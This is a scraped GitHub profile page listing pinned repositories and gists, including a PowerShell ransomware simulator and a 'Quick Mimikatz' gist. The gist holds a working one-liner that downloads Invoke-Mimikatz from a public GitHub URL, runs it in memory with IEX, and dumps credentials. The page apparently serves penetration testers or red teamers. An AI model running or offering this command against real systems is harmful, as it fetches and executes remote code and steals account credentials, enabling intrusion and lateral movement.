Pinned Loading
-
RansomwareSimulator-POSH
RansomwareSimulator-POSH PublicUsing Powershell to Simulate a ransomware attack
-
-
PowerShell: Script Template
PowerShell: Script Template 1#requires -version 2
2<#
3.SYNOPSIS
4<Overview of script>
5 -
Quick Mimikatz
Quick Mimikatz 1*NOTE - These pull from public GitHub Repos that are not under my control. Make sure you trust the content (or better yet, make your own fork) prior to using!*
23#mimikatz
4IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); $m = Invoke-Mimikatz -DumpCreds; $m
5
Something went wrong, please refresh the page to try again.
If the problem persists, check the GitHub status page or contact support.
If the problem persists, check the GitHub status page or contact support.